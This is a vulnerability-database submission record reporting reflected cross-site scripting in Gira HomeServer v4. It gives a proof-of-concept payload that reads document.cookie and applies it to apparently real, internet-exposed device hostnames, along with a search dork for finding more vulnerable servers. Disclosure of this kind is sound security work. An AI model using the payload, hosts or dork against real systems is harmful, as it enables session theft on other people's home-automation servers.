| Titolo | Gira HomeServer v4 Reflected Cross-Site Scripting |
|---|
| Descrizione | PoC:
Is it possible to escape with quotes via the hslist?lst=debug parameter, causing reflected cross-site scripting
https://x.x.x.x/hslist?lst=debug%27%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E (Version 4.12.0.220829 beta)
https://6cfa3ae45b506ee1966df14328c60679.rnas-dyn.bluewin.ch/hslist?lst=debug%27%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E (Version 4.11.3.220701)
http://jrola.xyz/hslist?lst=debug%27%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E (Version 4.11.1.210701)
Google Dork:
intext:"Gira HomeServer 4."
Product:
https://partner.gira.com/en/systeme/knx-system/knx-produkte/server/homeserver.html |
|---|
| Fonte | ⚠️ https://partner.gira.com/en/systeme/knx-system/knx-produkte/server/homeserver.html |
|---|
| Utente | Stux (UID 40142) |
|---|
| Sottomissione | 06/05/2023 17:53 (3 anni fa) |
|---|
| Moderazione | 16/05/2023 16:37 (10 days later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 229150 [Gira HomeServer fino a 4.12.0.220829 beta /hslist lst cross site scripting] |
|---|
| Punti | 20 |
|---|